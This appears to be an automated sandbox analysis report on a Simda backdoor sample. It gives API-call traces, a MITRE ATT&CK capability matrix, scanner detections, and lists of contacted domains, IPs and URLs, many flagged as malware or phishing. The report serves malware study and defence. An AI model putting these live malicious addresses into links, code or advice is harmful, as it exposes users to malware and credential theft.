Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_012F98E0 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,	4_2_012F98E0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_01310DB0 htons,socket,setsockopt,closesocket,bind,listen,	4_2_01310DB0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_0130FFE0 setsockopt,htons,socket,setsockopt,bind,	4_2_0130FFE0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E498E0 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,	5_2_00E498E0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E60DB0 htons,socket,setsockopt,closesocket,bind,listen,	5_2_00E60DB0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E5FFE0 setsockopt,htons,socket,setsockopt,bind,	5_2_00E5FFE0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00E898E0 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,	8_2_00E898E0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00EA0DB0 htons,socket,setsockopt,closesocket,bind,listen,	8_2_00EA0DB0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00E9FFE0 setsockopt,htons,socket,setsockopt,bind,	8_2_00E9FFE0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	34 Native API	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	111 Input Capture	2 System Time Discovery	1 Remote Desktop Protocol	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 Create Account	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	11 Account Discovery	Remote Desktop Protocol	1 Screen Capture	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	623 Process Injection	1 Abuse Elevation Control Mechanism	Security Account Manager	1 System Network Connections Discovery	SMB/Windows Admin Shares	111 Input Capture	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	21 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	2 Obfuscated Files or Information	NTDS	2 File and Directory Discovery	Distributed Component Object Model	2 Clipboard Data	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	1 Bootkit	21 Registry Run Keys / Startup Folder	31 Software Packing	LSA Secrets	143 System Information Discovery	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Query Registry	VNC	GUI Input Capture	14 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	321 Masquerading	DCSync	561 Security Software Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	241 Virtualization/Sandbox Evasion	Proc Filesystem	241 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	623 Process Injection	/etc/passwd and /etc/shadow	13 Process Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Bootkit	Network Sniffing	11 Application Window Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	Stripped Payloads	Input Capture	1 System Owner/User Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
roundwood.exe	89%	ReversingLabs	Win32.Backdoor.Simda
roundwood.exe	100%	Avira	TR/Crypt.XPACK.Gen
roundwood.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/envelope/	0%	URL Reputation	safe
http://www.symantec.com	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/02/scAAAAA	0%	Avira URL Cloud	safe
http://ww16.vofycot.com/login.php?sub1=20240824-0243-077d-8f61-d4c58a818681	100%	Avira URL Cloud	malware
http://www.google.comtw	0%	Avira URL Cloud	safe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-	0%	Avira URL Cloud	safe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdXdgj	0%	Avira URL Cloud	safe
http://ww25.lyxynyx.com/login.php?subid1=20240824-0244-06be-9bcf-3aaf77f61bcb	100%	Avira URL Cloud	malware
http://lyvyxor.com/login.php	100%	Avira URL Cloud	malware
https://login.microsoftonline.com/ppsecure/ResolveUser.srf	0%	Avira URL Cloud	safe
https://nojs.domaincntrol.com	0%	Avira URL Cloud	safe
http://Passport.NET/tbA	0%	Avira URL Cloud	safe
http://galyqaz.com/Printing_Machines.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGtsfisSsLM8y	100%	Avira URL Cloud	malware
http://Passport.NET/STS</ds:KeyName>&lt	0%	Avira URL Cloud	safe
http://puzylyp.com/login.phpA:	100%	Avira URL Cloud	malware
http://ww1.lysyfyj.com/	100%	Avira URL Cloud	phishing
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdA	0%	Avira URL Cloud	safe
http://ww25.lyxynyx.com/login.php?subid1=20240824-0243-071d-8c4b-3f42cf5256c3co	100%	Avira URL Cloud	malware
http://lyrysor.com/login.php	100%	Avira URL Cloud	phishing
http://puzylyp.com/login.php	100%	Avira URL Cloud	malware
http://schemas.xmlsoap.org/ws/2005/	0%	Avira URL Cloud	safe
https://www.google.com	0%	Avira URL Cloud	safe
https://domaincntrol.com/?orighost=	0%	Avira URL Cloud	safe
http://lyxynyx.com/login.php	100%	Avira URL Cloud	malware
http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2	0%	Avira URL Cloud	safe
http://ww16.vofycot.com/login.php?sub1=20240824-0244-0577-915a-f20bc3a7af60	100%	Avira URL Cloud	malware
http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2004/09/policy~	0%	Avira URL Cloud	safe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds	0%	Avira URL Cloud	safe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAA	0%	Avira URL Cloud	safe
https://login.microsoftonline.com/ppsecure/devicechangecredential.srf	0%	Avira URL Cloud	safe
http://qegyval.com/login.php29	100%	Avira URL Cloud	malware
http://vojyqem.com/login.php	100%	Avira URL Cloud	malware
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAA	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/02/trustAAAAA	0%	Avira URL Cloud	safe
https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf	0%	Avira URL Cloud	safe
https://account.live.com/InlineSignup.aspx?iww=1&id=80502	0%	Avira URL Cloud	safe
https://account.live.com/inlinesignup.aspx?iww=1&id=80600ssuer	0%	Avira URL Cloud	safe
http://Passport.NET/tb_	0%	Avira URL Cloud	safe
http://InquiryGrid.com/sk-domsale.php?dom=galyqaz.com&eds=YnJva2VyYWdlQHNrZW56by5jb20%3D&_isk_=7444&	100%	Avira URL Cloud	malware
http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2	0%	Avira URL Cloud	safe
http://galynuh.com/login.php	100%	Avira URL Cloud	malware
http://qetyhyg.com/login.php	100%	Avira URL Cloud	phishing
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd~	0%	Avira URL Cloud	safe
http://i3.cdn-image.com/__media__/pics/29590/bg1.png)	0%	Avira URL Cloud	safe
https://login.microsoftonline.com/ppsecure/DeviceQuery.srfsuer	0%	Avira URL Cloud	safe
http://lyxynyx.com/login.php3	100%	Avira URL Cloud	malware
http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot	0%	Avira URL Cloud	safe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.x	0%	Avira URL Cloud	safe
http://www.google.comt3	0%	Avira URL Cloud	safe
http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff	0%	Avira URL Cloud	safe
https://account.live.com/msangcwam	0%	Avira URL Cloud	safe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdZ6PU	0%	Avira URL Cloud	safe
http://lymyxid.com/login.php	100%	Avira URL Cloud	malware
http://crl.ver)	0%	Avira URL Cloud	safe
http://i3.cdn-image.com/__media__/pics/28905/arrrow.png)	0%	Avira URL Cloud	safe
http://galyqaz.com/display.cfm	100%	Avira URL Cloud	malware
http://passport.net/tb	0%	Avira URL Cloud	safe
https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf	0%	Avira URL Cloud	safe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsAAAA	0%	Avira URL Cloud	safe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdUHV4ZU	0%	Avira URL Cloud	safe
http://gadyniw.com/login.php	100%	Avira URL Cloud	malware
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsds	0%	Avira URL Cloud	safe
http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf	0%	Avira URL Cloud	safe
http://qegyval.com/login.php	100%	Avira URL Cloud	malware
http://gahyhiz.com/login.php	0%	Avira URL Cloud	safe
http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf	0%	Avira URL Cloud	safe
http://pupydeq.com/login.php	100%	Avira URL Cloud	malware
http://106.15.137.66:8001/dh/147287063_637385.html	0%	Avira URL Cloud	safe
http://lygyvuj.com/login.php	100%	Avira URL Cloud	phishing
http://galyqaz.com/Commercial_Printing_Services.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUG	100%	Avira URL Cloud	malware
http://ww1.lysyfyj.com/?fp=ZbSrv2i18YnNfPNSqSsC6n0jQLvcDPBy65hKrYcVeZdyOk55NkMmURDujLfYrzEMz5BE5QmQN	100%	Avira URL Cloud	phishing
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdes	0%	Avira URL Cloud	safe
http://galyqaz.com/Printing_Inks.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGtsfisSsLM8yGzAG	100%	Avira URL Cloud	malware
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdzun9	0%	Avira URL Cloud	safe
http://ww6.galyqaz.com/GlobalSign	100%	Avira URL Cloud	malware
https://login.microsoftonline.com/ppsecure/ResolveUser.srfsuer	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/02/trustn	0%	Avira URL Cloud	safe
http://www.google.comtD	0%	Avira URL Cloud	safe
http://gadyciz.com/login.php	100%	Avira URL Cloud	malware
http://ww1.lysyfyj.com/t	100%	Avira URL Cloud	malware
http://ww25.lyxynyx.com/login.php?subid1=20240824-0244-06be-9bcf-3aaf77f61bcbser-AgentMozilla/4.0	100%	Avira URL Cloud	malware
https://dts.gnpge.com	0%	Avira URL Cloud	safe
http://106.15.137.66:8001/dh/147287063_637385.htmlindex8?d=lyrysor.com	0%	Avira URL Cloud	safe
http://gatyfus.com/login.phpcom/login.php	100%	Avira URL Cloud	malware
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdmlns:	0%	Avira URL Cloud	safe
http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff	0%	Avira URL Cloud	safe
http://lysyfyj.com/login.php?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cC	100%	Avira URL Cloud	malware
http://schemas.xmlsoap.org/ws/2005/02/scrf	0%	Avira URL Cloud	safe
http://gatyhub.com/login.php	100%	Avira URL Cloud	malware
https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf	0%	Avira URL Cloud	safe
https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf:CLSID	0%	Avira URL Cloud	safe
http://i3.cdn-image.com/__media__/pics/28903/search.png)	0%	Avira URL Cloud	safe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAA	0%	Avira URL Cloud	safe
https://cdn.consentmanager.net	0%	Avira URL Cloud	safe
https://login.microsoftonline.com/ppsecure/DeviceQuery.srf	0%	Avira URL Cloud	safe
https://lysyvan.com/	100%	Avira URL Cloud	malware
https://lysyvan.com/wp-json/	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
pupydeq.com	13.248.169.48	true	true	unknown
pupycag.com	18.208.156.248	true	true	unknown
lyvyxor.com	208.100.26.245	true	true	unknown
77026.bodis.com	199.59.243.226	true	false	unknown
lysyvan.com	188.114.97.3	true	true	unknown
galynuh.com	64.225.91.73	true	true	unknown
parkingpage.namecheap.com	91.195.240.19	true	true	unknown
qegyhig.com	188.114.97.3	true	true	unknown
gatyfus.com	85.17.31.82	true	true	unknown
vonypom.com	18.208.156.248	true	true	unknown
82957.bodis.com	199.59.243.226	true	false	unknown
puzylyp.com	3.64.163.50	true	true	unknown
qexyhuv.com	15.197.240.20	true	true	unknown
pltraffic7.com	72.52.179.174	true	true	unknown
gadyciz.com	44.221.84.105	true	true	unknown
gadyniw.com	154.212.231.82	true	true	unknown
lyxynyx.com	103.224.212.210	true	true	unknown
www.sedoparking.com	64.190.63.136	true	false	unknown
lygyvuj.com	52.34.198.229	true	true	unknown
gahyqah.com	23.253.46.64	true	true	unknown
vocyzit.com	44.221.84.105	true	true	unknown
galyqaz.com	199.191.50.83	true	true	unknown
vofycot.com	103.224.182.252	true	true	unknown
qetyhyg.com	64.225.91.73	true	true	unknown
vojyqem.com	172.234.222.143	true	true	unknown
gahyhiz.com	44.221.84.105	true	true	unknown
qetyfuv.com	44.221.84.105	true	true	unknown
9145.searchmagnified.com	208.91.196.145	true	false	unknown
lysyfyj.com	69.162.80.57	true	true	unknown
gtm-sg-6l13ukk0m05.qu200.com	103.150.11.230	true	true	unknown
lymyxid.com	3.94.10.34	true	true	unknown
qegyval.com	154.85.183.50	true	true	unknown
gatyzoz.com	unknown	unknown	true	unknown
lykygaj.com	unknown	unknown	true	unknown
qedyxel.com	unknown	unknown	true	unknown
qedyqup.com	unknown	unknown	true	unknown
qekyluv.com	unknown	unknown	true	unknown
gatyrez.com	unknown	unknown	true	unknown
vofybic.com	unknown	unknown	true	unknown
pujydag.com	unknown	unknown	true	unknown
vojykom.com	unknown	unknown	true	unknown
qetysuq.com	unknown	unknown	true	unknown
vonyzut.com	unknown	unknown	true	unknown
pufyjuq.com	unknown	unknown	true	unknown
pujytug.com	unknown	unknown	true	unknown
galyhiw.com	unknown	unknown	true	unknown
lykygun.com	unknown	unknown	true	unknown
vopymyc.com	unknown	unknown	true	unknown
gatyfaz.com	unknown	unknown	true	unknown
vojycit.com	unknown	unknown	true	unknown
lyvymej.com	unknown	unknown	true	unknown
lygyvar.com	unknown	unknown	true	unknown
purygiv.com	unknown	unknown	true	unknown
gahykeb.com	unknown	unknown	true	unknown
purymog.com	unknown	unknown	true	unknown
gadyzib.com	unknown	unknown	true	unknown
ganyqow.com	unknown	unknown	true	unknown
lyxysun.com	unknown	unknown	true	unknown
puzyjyg.com	unknown	unknown	true	unknown
vopydek.com	unknown	unknown	true	unknown
qexyfuq.com	unknown	unknown	true	unknown
gatykyh.com	unknown	unknown	true	unknown
vocykem.com	unknown	unknown	true	unknown
gahynus.com	unknown	unknown	true	unknown
pumypop.com	unknown	unknown	true	unknown
lyvysur.com	unknown	unknown	true	unknown
puzypav.com	unknown	unknown	true	unknown
galypob.com	unknown	unknown	true	unknown
gacyqoz.com	unknown	unknown	true	unknown
lykywid.com	unknown	unknown	true	unknown
lykytin.com	unknown	unknown	true	unknown
vofyref.com	unknown	unknown	true	unknown
qekytig.com	unknown	unknown	true	unknown
vocyzek.com	unknown	unknown	true	unknown
puvypoq.com	unknown	unknown	true	unknown
puvybeg.com	unknown	unknown	true	unknown
pupydig.com	unknown	unknown	true	unknown
pupyguq.com	unknown	unknown	true	unknown
qedyqal.com	unknown	unknown	true	unknown
vowymom.com	unknown	unknown	true	unknown
purypol.com	unknown	unknown	true	unknown
ganypeb.com	unknown	unknown	true	unknown
vopymit.com	unknown	unknown	true	unknown
vowyguf.com	unknown	unknown	true	unknown
pupytiq.com	unknown	unknown	true	unknown
lymyfoj.com	unknown	unknown	true	unknown
vowyzuf.com	unknown	unknown	true	unknown
gatyruw.com	unknown	unknown	true	unknown
qebynyg.com	unknown	unknown	true	unknown
puzymev.com	unknown	unknown	true	unknown
pupymol.com	unknown	unknown	true	unknown
vojycif.com	unknown	unknown	true	unknown
qebyvyl.com	unknown	unknown	true	unknown
lymysan.com	unknown	unknown	true	unknown
qekynuq.com	unknown	unknown	true	unknown
puryjil.com	unknown	unknown	true	unknown
puvytuv.com	unknown	unknown	true	unknown
galyzus.com	unknown	unknown	true	unknown
gadyfuh.com	unknown	unknown	true	unknown
vofycyk.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ww16.vofycot.com/login.php?sub1=20240824-0243-077d-8f61-d4c58a818681	false	Avira URL Cloud: malware	unknown
http://ww25.lyxynyx.com/login.php?subid1=20240824-0244-06be-9bcf-3aaf77f61bcb	false	Avira URL Cloud: malware	unknown
http://lyvyxor.com/login.php	true	Avira URL Cloud: malware	unknown
http://lyrysor.com/login.php	true	Avira URL Cloud: phishing	unknown
http://ww1.lysyfyj.com/	false	Avira URL Cloud: phishing	unknown
http://puzylyp.com/login.php	true	Avira URL Cloud: malware	unknown
http://lyxynyx.com/login.php	true	Avira URL Cloud: malware	unknown
http://ww16.vofycot.com/login.php?sub1=20240824-0244-0577-915a-f20bc3a7af60	false	Avira URL Cloud: malware	unknown
http://vojyqem.com/login.php	true	Avira URL Cloud: malware	unknown
http://galynuh.com/login.php	true	Avira URL Cloud: malware	unknown
http://qetyhyg.com/login.php	true	Avira URL Cloud: phishing	unknown
http://lymyxid.com/login.php	true	Avira URL Cloud: malware	unknown
http://gadyniw.com/login.php	true	Avira URL Cloud: malware	unknown
http://gahyhiz.com/login.php	true	Avira URL Cloud: safe	unknown
http://qegyval.com/login.php	true	Avira URL Cloud: malware	unknown
http://pupydeq.com/login.php	true	Avira URL Cloud: malware	unknown
http://106.15.137.66:8001/dh/147287063_637385.html	false	Avira URL Cloud: safe	unknown
http://lygyvuj.com/login.php	true	Avira URL Cloud: phishing	unknown
http://gadyciz.com/login.php	true	Avira URL Cloud: malware	unknown
http://gatyhub.com/login.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.google.comtw	svchost.exe, 00000002.00000003.2600887126.0000000002BB7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://nojs.domaincntrol.com	svchost.exe, 00000002.00000002.3273031820.0000000002B77000.00000004.00000020.00020000.00000000.sdmp, login[2].htm0.2.dr, login[3].htm.2.dr, login[2].htm.2.dr	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/scAAAAA	svchost.exe, 0000000E.00000003.2570549062.0000017E5C37A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdXdgj	svchost.exe, 0000000E.00000003.2620633015.0000017E5C383000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2634539675.0000017E5C383000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.symantec.com	roundwood.exe, svchost.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://login.microsoftonline.com/ppsecure/ResolveUser.srf	svchost.exe, 0000000E.00000003.2433705035.0000017E5C363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433615835.0000017E5C33B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433675117.0000017E5C340000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-	svchost.exe, 0000000E.00000003.2620633015.0000017E5C383000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2634539675.0000017E5C383000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://Passport.NET/tbA	svchost.exe, 0000000E.00000003.2559787764.0000017E5C376000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2568836283.0000017E5C378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2570549062.0000017E5C37A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://puzylyp.com/login.phpA:	oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000004.00000002.2718622686.00000000011EF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdA	svchost.exe, 0000000E.00000003.2497798842.0000017E5C30F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2498088928.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2496908758.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2708202972.0000017E5C307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2495670972.0000017E5C307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2620568756.0000017E5C307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2692130813.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2607005185.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2721724752.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2663679549.0000017E5C307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2496072630.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2737081538.0000017E5C307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2708824809.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2663951879.0000017E5C307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2721936085.0000017E5C307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2692062029.0000017E5C307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2663822263.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2593122356.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2620465897.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2497932591.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2498749154.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://galyqaz.com/Printing_Machines.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGtsfisSsLM8y	login[2].htm1.2.dr	false	Avira URL Cloud: malware	unknown
http://ww25.lyxynyx.com/login.php?subid1=20240824-0243-071d-8c4b-3f42cf5256c3co	svchost.exe, 00000002.00000002.3272732597.0000000002B37000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://Passport.NET/STS</ds:KeyName>&lt	svchost.exe, 0000000E.00000002.3272292196.0000017E5BB02000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/	svchost.exe, 0000000E.00000002.3273209037.0000017E5CA00000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com	svchost.exe, 00000002.00000003.3004421327.0000000002BAF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2921538200.0000000002BAF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2905676121.0000000002BAF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://domaincntrol.com/?orighost=	svchost.exe, 00000002.00000002.3273031820.0000000002B77000.00000004.00000020.00020000.00000000.sdmp, login[2].htm0.2.dr, login[3].htm.2.dr, login[2].htm.2.dr	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue	svchost.exe, 0000000E.00000002.3272985921.0000017E5C35F000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2	login[2].htm1.2.dr	false	Avira URL Cloud: safe	unknown
http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf	login[2].htm1.2.dr	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAA	svchost.exe, 0000000E.00000003.2570549062.0000017E5C37A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
